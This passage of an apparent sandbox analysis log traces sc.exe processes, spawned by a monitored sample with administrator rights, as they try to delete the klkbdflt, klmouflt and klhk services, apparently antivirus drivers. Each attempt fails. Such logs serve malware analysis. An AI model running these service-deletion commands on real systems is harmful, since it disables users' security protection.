AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1309 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1310 start_va = 0xd9f090000 end_va = 0xd9f0affff entry_point = 0x0 region_type = private name = "private_0x0000000d9f090000" filename = "" Region: id = 1311 start_va = 0xd9f0b0000 end_va = 0xd9f0c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d9f0b0000" filename = "" Region: id = 1312 start_va = 0xd9f0d0000 end_va = 0xd9f14ffff entry_point = 0x0 region_type = private name = "private_0x0000000d9f0d0000" filename = "" Region: id = 1313 start_va = 0xd9f150000 end_va = 0xd9f153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d9f150000" filename = "" Region: id = 1314 start_va = 0xd9f160000 end_va = 0xd9f160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d9f160000" filename = "" Region: id = 1315 start_va = 0xd9f170000 end_va = 0xd9f171fff entry_point = 0x0 region_type = private name = "private_0x0000000d9f170000" filename = "" Region: id = 1316 start_va = 0x7df5ffc80000 end_va = 0x7ff5ffc7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc80000" filename = "" Region: id = 1317 start_va = 0x7ff67a660000 end_va = 0x7ff67a682fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a660000" filename = "" Region: id = 1318 start_va = 0x7ff67a686000 end_va = 0x7ff67a686fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a686000" filename = "" Region: id = 1319 start_va = 0x7ff67a68e000 end_va = 0x7ff67a68ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a68e000" filename = "" Region: id = 1320 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1321 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1711 start_va = 0xd9f2a0000 end_va = 0xd9f39ffff entry_point = 0x0 region_type = private name = "private_0x0000000d9f2a0000" filename = "" Region: id = 1712 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1713 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5210 start_va = 0xd9f090000 end_va = 0xd9f09ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d9f090000" filename = "" Region: id = 5211 start_va = 0xd9f0a0000 end_va = 0xd9f0a6fff entry_point = 0x0 region_type = private name = "private_0x0000000d9f0a0000" filename = "" Region: id = 5212 start_va = 0xd9f180000 end_va = 0xd9f23dfff entry_point = 0xd9f180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5213 start_va = 0xd9f3a0000 end_va = 0xd9f41ffff entry_point = 0x0 region_type = private name = "private_0x0000000d9f3a0000" filename = "" Region: id = 5214 start_va = 0xd9f540000 end_va = 0xd9f54ffff entry_point = 0x0 region_type = private name = "private_0x0000000d9f540000" filename = "" Region: id = 5215 start_va = 0x7ff67a560000 end_va = 0x7ff67a65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a560000" filename = "" Region: id = 5216 start_va = 0x7ff67a68c000 end_va = 0x7ff67a68dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a68c000" filename = "" Region: id = 5217 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5218 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5219 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5220 start_va = 0xd9f240000 end_va = 0xd9f246fff entry_point = 0x0 region_type = private name = "private_0x0000000d9f240000" filename = "" Region: id = 5221 start_va = 0xd9f420000 end_va = 0xd9f4fefff entry_point = 0xd9f420000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5222 start_va = 0xd9f250000 end_va = 0xd9f261fff entry_point = 0xd9f250000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 90 os_tid = 0xdc8 [0077.476] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.476] __set_app_type (_Type=0x1) [0077.476] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.476] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.476] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.521] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.521] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.521] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.521] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.521] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.521] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.521] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.521] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.521] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.521] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.521] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.521] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.521] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.521] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.521] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.521] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.521] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.521] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.521] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.521] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.521] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.521] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.521] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.521] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.522] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.522] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.522] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.522] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.523] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd9f2a8bc0 [0077.527] OpenServiceW (hSCManager=0xd9f2a8bc0, lpServiceName="klkbdflt", dwDesiredAccess=0x10000) returned 0x0 [0077.528] GetLastError () returned 0x424 [0077.528] _ultow (in: _Dest=0x424, _Radix=-1626016120 | out: _Dest=0x424) returned="1060" [0077.528] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.529] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xd9f14f640, nSize=0x2, Arguments=0xd9f14f670 | out: lpBuffer="鎰鼪\r") returned 0x62 [0077.530] GetFileType (hFile=0x24) returned 0x2 [0077.530] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xd9f14f5f0 | out: lpMode=0xd9f14f5f0) returned 1 [0077.547] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xd9f2a93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xd9f14f5e8, lpReserved=0x0 | out: lpBuffer=0xd9f2a93b0*, lpNumberOfCharsWritten=0xd9f14f5e8*=0x62) returned 1 [0077.547] LocalFree (hMem=0xd9f2a93b0) returned 0x0 [0077.547] LocalFree (hMem=0x0) returned 0x0 [0077.547] CloseServiceHandle (hSCObject=0xd9f2a8bc0) returned 1 [0077.548] LocalFree (hMem=0x0) returned 0x0 [0077.548] exit (_Code=1060) Thread: id = 330 os_tid = 0x12d0 Process: id = "63" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf039000" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klmouflt\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1322 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1323 start_va = 0xbaace10000 end_va = 0xbaace2ffff entry_point = 0x0 region_type = private name = "private_0x000000baace10000" filename = "" Region: id = 1324 start_va = 0xbaace30000 end_va = 0xbaace43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baace30000" filename = "" Region: id = 1325 start_va = 0xbaace50000 end_va = 0xbaacecffff entry_point = 0x0 region_type = private name = "private_0x000000baace50000" filename = "" Region: id = 1326 start_va = 0xbaaced0000 end_va = 0xbaaced3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baaced0000" filename = "" Region: id = 1327 start_va = 0xbaacee0000 end_va = 0xbaacee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baacee0000" filename = "" Region: id = 1328 start_va = 0xbaacef0000 end_va = 0xbaacef1fff entry_point = 0x0 region_type = private name = "private_0x000000baacef0000" filename = "" Region: id = 1329 start_va = 0x7df5ff510000 end_va = 0x7ff5ff50ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff510000" filename = "" Region: id = 1330 start_va = 0x7ff67a710000 end_va = 0x7ff67a732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a710000" filename = "" Region: id = 1331 start_va = 0x7ff67a73d000 end_va = 0x7ff67a73efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73d000" filename = "" Region: id = 1332 start_va = 0x7ff67a73f000 end_va = 0x7ff67a73ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73f000" filename = "" Region: id = 1333 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1334 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1714 start_va = 0xbaad0b0000 end_va = 0xbaad1affff entry_point = 0x0 region_type = private name = "private_0x000000baad0b0000" filename = "" Region: id = 1715 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1716 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4991 start_va = 0xbaace10000 end_va = 0xbaace1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000baace10000" filename = "" Region: id = 4992 start_va = 0xbaace20000 end_va = 0xbaace26fff entry_point = 0x0 region_type = private name = "private_0x000000baace20000" filename = "" Region: id = 4993 start_va = 0xbaacf00000 end_va = 0xbaacfbdfff entry_point = 0xbaacf00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4994 start_va = 0xbaacfc0000 end_va = 0xbaad03ffff entry_point = 0x0 region_type = private name = "private_0x000000baacfc0000" filename = "" Region: id = 4995 start_va = 0xbaad280000 end_va = 0xbaad28ffff entry_point = 0x0 region_type = private name = "private_0x000000baad280000" filename = "" Region: id = 4996 start_va = 0x7ff67a610000 end_va = 0x7ff67a70ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a610000" filename = "" Region: id = 4997 start_va = 0x7ff67a73b000 end_va = 0x7ff67a73cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73b000" filename = "" Region: id = 4998 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4999 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5006 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5007 start_va = 0xbaad040000 end_va = 0xbaad046fff entry_point = 0x0 region_type = private name = "private_0x000000baad040000" filename = "" Region: id = 5008 start_va = 0xbaad290000 end_va = 0xbaad36efff entry_point = 0xbaad290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5009 start_va = 0xbaad050000 end_va = 0xbaad061fff entry_point = 0xbaad050000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 91 os_tid = 0xdd0 [0074.398] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0074.398] __set_app_type (_Type=0x1) [0074.398] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0074.398] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0074.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0074.494] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0074.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0074.494] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0074.494] _wcsicmp (_String1="delete", _String2="query") returned -13 [0074.494] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0074.494] _wcsicmp (_String1="delete", _String2="start") returned -15 [0074.494] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0074.494] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0074.494] _wcsicmp (_String1="delete", _String2="control") returned 1 [0074.494] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0074.494] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0074.494] _wcsicmp (_String1="delete", _String2="config") returned 1 [0074.494] _wcsicmp (_String1="delete", _String2="description") returned -7 [0074.494] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0074.495] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0074.495] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0074.495] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0074.495] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0074.495] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0074.495] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0074.495] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0074.495] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0074.495] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0074.495] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0074.495] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0074.497] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xbaad0b8c50 [0074.501] OpenServiceW (hSCManager=0xbaad0b8c50, lpServiceName="klmouflt\"", dwDesiredAccess=0x10000) returned 0x0 [0074.501] GetLastError () returned 0x424 [0074.501] _ultow (in: _Dest=0x424, _Radix=-1393754936 | out: _Dest=0x424) returned="1060" [0074.501] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0074.503] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xbaacecfc80, nSize=0x2, Arguments=0xbaacecfcb0 | out: lpBuffer="鎰괋º") returned 0x62 [0074.503] GetFileType (hFile=0x24) returned 0x2 [0074.503] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xbaacecfc30 | out: lpMode=0xbaacecfc30) returned 1 [0074.617] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xbaad0b93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xbaacecfc28, lpReserved=0x0 | out: lpBuffer=0xbaad0b93b0*, lpNumberOfCharsWritten=0xbaacecfc28*=0x62) returned 1 [0074.617] LocalFree (hMem=0xbaad0b93b0) returned 0x0 [0074.617] LocalFree (hMem=0x0) returned 0x0 [0074.617] CloseServiceHandle (hSCObject=0xbaad0b8c50) returned 1 [0074.618] LocalFree (hMem=0x0) returned 0x0 [0074.618] exit (_Code=1060) Thread: id = 320 os_tid = 0x123c Process: id = "64" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x54fbe000" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klhk\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1335 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1336 start_va = 0x761fdc0000 end_va = 0x761fddffff entry_point = 0x0 region_type = private name = "private_0x000000761fdc0000" filename = "" Region: id = 1337 start_va = 0x761fde0000 end_va = 0x761fdf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000761fde0000" filename = "" Region: id = 1338 start_va = 0x761fe00000 end_va = 0x761fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000761fe00000" filename = "" Region: id = 1339 start_va = 0x761fe80000 end_va = 0x761fe83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000761fe80000" filename = "" Region: id = 1340 start_va = 0x761fe90000 end_va = 0x761fe90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000761fe90000" filename = "" Region: id = 1341 start_va = 0x761fea0000 end_va = 0x761fea1fff entry_point = 0x0 region_type = private name = "private_0x000000761fea0000" filename = "" Region: id = 1342 start_va = 0x7df5ff220000 end_va = 0x7ff5ff21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff220000" filename = "" Region: id = 1343 start_va = 0x7ff67a4a0000 end_va = 0x7ff67a4c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a4a0000" filename = "" Region: id = 1344 start_va = 0x7ff67a4cc000 end_va = 0x7ff67a4cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a4cc000" filename = "" Region: id = 1345 start_va = 0x7ff67a4ce000 end_va = 0x7ff67a4cefff entry_point = 0x0 region_type = private name = "private_0x00007ff67a4ce000" filename = "" Region: id = 1346 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1347 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1717 start_va = 0x7620060000 end_va = 0x762015ffff entry_point = 0x0 region_type = private name = "private_0x0000007620060000" filename = "" Region: id = 1718 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1719 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5223 start_va = 0x761fdc0000 end_va = 0x761fdcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000761fdc0000" filename = "" Region: id = 5224 start_va = 0x761fdd0000 end_va = 0x761fdd6fff entry_point = 0x0 region_type = private name = "private_0x000000761fdd0000" filename = "" Region: id = 5225 start_va = 0x761feb0000 end_va = 0x761ff6dfff entry_point = 0x761feb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5226 start_va = 0x761ff70000 end_va = 0x761ffeffff entry_point = 0x0 region_type = private name = "private_0x000000761ff70000" filename = "" Region: id = 5227 start_va = 0x7620280000 end_va = 0x762028ffff entry_point = 0x0 region_type = private name = "private_0x0000007620280000" filename = "" Region: id = 5228 start_va = 0x7ff67a3a0000 end_va = 0x7ff67a49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a3a0000" filename = "" Region: id = 5229 start_va = 0x7ff67a4ca000 end_va = 0x7ff67a4cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a4ca000" filename = "" Region: id = 5230 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5231 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5234 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5235 start_va = 0x761fff0000 end_va = 0x761fff6fff entry_point = 0x0 region_type = private name = "private_0x000000761fff0000" filename = "" Region: id = 5236 start_va = 0x7620160000 end_va = 0x762023efff entry_point = 0x7620160000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5237 start_va = 0x7620000000 end_va = 0x7620011fff entry_point = 0x7620000000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 92 os_tid = 0xdd8 [0077.541] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.541] __set_app_type (_Type=0x1) [0077.541] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.541] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.542] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.603] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.603] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.603] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.603] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.603] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.603] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.603] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.604] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.604] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.604] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.604] _wcsicmp (_String1="delete", _String2="stop") returned -15 